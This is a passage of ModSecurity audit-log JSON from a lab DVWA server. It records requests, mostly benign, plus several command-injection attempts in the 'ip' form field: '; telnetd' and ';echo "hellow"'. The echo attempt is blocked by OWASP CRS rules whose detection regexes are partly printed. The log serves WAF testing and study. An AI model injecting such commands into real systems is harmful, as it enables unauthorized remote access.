\"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRczQH8AAQEAAAkYuEcAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":728,"p2":3497,"p3":101,"p4":165,"p5":68,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:32 --0400","transaction_id":"WRczQH8AAQEAAAkYuEgAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRczQH8AAQEAAAkYuEgAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":656,"p2":2384,"p3":157,"p4":898,"p5":80,"sr":45,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:35 --0400","transaction_id":"WRczQ38AAQEAAAkYuEkAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczQ38AAQEAAAkYuEkAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":638,"p2":2256,"p3":149,"p4":495,"p5":105,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:35 --0400","transaction_id":"WRczQ38AAQEAAAkYuEoAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczQ38AAQEAAAkYuEoAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":614,"p2":2154,"p3":215,"p4":432,"p5":96,"sr":39,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:54 --0400","transaction_id":"WRczVn8AAQEAAAkZ0BAAAAAE","remote_address":"192.168.75.145","remote_port":56758,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"28"},"body":["ip=%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczVn8AAQEAAAkZ0BAAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":940,"p2":2340,"p3":158,"p4":734,"p5":106,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:59 --0400","transaction_id":"WRczW38AAQEAAAkVV4gAAAAA","remote_address":"192.168.75.145","remote_port":56760,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"31"},"body":["ip=%27%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczW38AAQEAAAkVV4gAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":638,"p2":2285,"p3":224,"p4":383,"p5":76,"sr":69,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:11 --0400","transaction_id":"WRczZ38AAQEAAAmHBJMAAAAF","remote_address":"192.168.75.145","remote_port":56762,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"37"},"body":["ip=%3Becho+%22hellow%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\x22hellow found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\\\\\\\x22hellow found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w 